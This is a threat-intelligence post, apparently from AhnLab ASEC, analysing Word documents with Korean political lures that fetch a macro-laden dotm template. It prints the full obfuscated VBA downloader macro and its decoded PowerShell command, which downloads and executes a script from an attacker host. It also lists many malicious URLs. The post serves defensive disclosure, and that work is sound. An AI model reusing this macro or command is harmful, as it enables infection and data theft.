The ASEC analysis team confirmed that the malware with the same format of malicious word documents introduced in the post “Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed” is still being distributed. Like the malicious word documents introduced in previous cases, the recently discovered word files also download the dotm file with the malicious macro through the external link. The filenames and external URLs confirmed are as follows.
Date Discovered | Filename | External URL |
July 3rd | [Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
July 6th | 00225 Conversation between Korean members of the National Assembly and American Members of Congress ***.docx | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
July 9th | Professor *** BIO.docx | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
July 12th | Professor ***-BIO.docx | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
July 15th | BIO Template.docx | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |

The downloaded dotm files all include a macro that is the same type as the one previously discovered. Below is the malicious macro within the dotm file downloaded from the external link (hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm) of BIO Template.docx.
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
ndkflajdkfjskdjfl = "tlsiaNtlsiaetlsiattlsia.tlsiaWtlsiaetlsiabtlsiaCtlsialtlsiaitlsiaetlsiantlsiattlsia)tlsia.tlsiaDotlsiantlsiagtlsia"
ndkflajdkfjskdjfl = Replace(ndkflajdkfjskdjfl, fjdjkasf, "")
salfnxkfdlsjafkj = "('htlsiattlsiattlsiaptlsia:tlsia/tlsia/tlsiattlsiabtlsiaetlsiaatlsiartlsia.tlsiamtlsiaytlsiaptlsiartlsiaetlsiastlsiastlsiaotlsiantlsialtlsiaitlsiantlsiaetlsia.tlsiactlsiaotlsiamtlsia/tlsiactlsiaitlsia/tlsiamotlsia.tlsiattlsiaxtlsiat')"
salfnxkfdlsjafkj = Replace(salfnxkfdlsjafkj, fjdjkasf, "")
sjdfkjaslalsfial = "tlsia}tlsia;tlsia$tlsiabtlsia=tlsia$tlsiaatlsia.tlsiaitlsiantlsiastlsiaetlsiartlsiattlsia(tlsia2tlsia9tlsia,tlsia'"
sjdfkjaslalsfial = Replace(sjdfkjaslalsfial, fjdjkasf, "")
aksfkjaskjfksnkf = "tlsiatlsiawtlsiantlsialtlsiaotlsiaatlsiadtlsiastlsiattlsiartlsiaitlsia'tlsia)tlsia;tlsia$tlsiactlsia=tlsiaitlsia"
aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
sdfewjdhsajkfhjdf = "etlsiaxtlsia tlsia$tlsiabtlsia;tlsiaitlsiaetlsiaxtlsia tlsia$tlsiactlsia"
sdfewjdhsajkfhjdf = Replace(sdfewjdhsajkfhjdf, fjdjkasf, "")
skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf + sdfewjdhsajkfhjdf
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
End Function
Code 1. Macro code within BIO.dotm file
When the macro is executed, the powershell command below is run, downloading and running the script in hxxp://tbear.mypressonline.com/ci/mo.txt.
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” [string]$a={(New-Object Net.WebClient).Dong(‘hxxp://tbear.mypressonline.com/ci/mo.txt’)};$b=$a.insert(29,’wnloadstri’);$c=iex $b;iex $c |

The malicious script has the same format as the one explained in the previous post except for the C2 URL, and performs behaviors such as collecting user information and downloading additional files as shown below.
- Downloads additional malicious files
- Collects list of recent files
- Collects SystemInfo
- Collects tasklist
- Uploads collected files
In addition, there were many URLs downloading malicious dotm shown above and those with malicious scripts.
hxxp://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm hxxp://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
hxxp://stair.myartsonline.com/ya/ng.txt hxxp://lovels.myartsonline.com/ys/ha.txt hxxp://lovel.myartsonline.com/le/ej.txt hxxp://visul.myartsonline.com/yk/yo.txt hxxp://vbqwer.mypressonline.com/test.log hxxp://tbear.mypressonline.com/test.txt hxxp://obser.mygamesonline.org/nw.txt hxxp://modri.myartsonline.com/gu/nw.txt hxxp://warcr.onlinewebshop.net/le/eh.txt hxxp://stair.atwebpages.com/ne/la.txt hxxp://giruz.atwebpages.com/sw/cu.txt hxxp://benze.atwebpages.com/ki/mc.txt hxxp://likel.atwebpages.com/bu/ma.txt hxxp://rster.atwebpages.com/an/ce.txt hxxp://mantc.getenjoyment.net/ya/ng.txt |
As targeted malware disguised as normal word documents are still being distributed, users need to take extra caution. They should refrain from opening files with unknown sources and running macros included in document files. Additionally, as the malware performs the feature of changing the macro security settings, users should periodically check the security settings, and maintain it as high.
AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.
[File Detection]
- Downloader/XML.External
- Downloader/DOC.Agent
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
[…] macro code is a bit more obfuscated than the one covered in the previous post ‘APT Attack Attempts Using Word Documents to Target Specific Individuals‘. When the macro is run, it downloads additional scripts from […]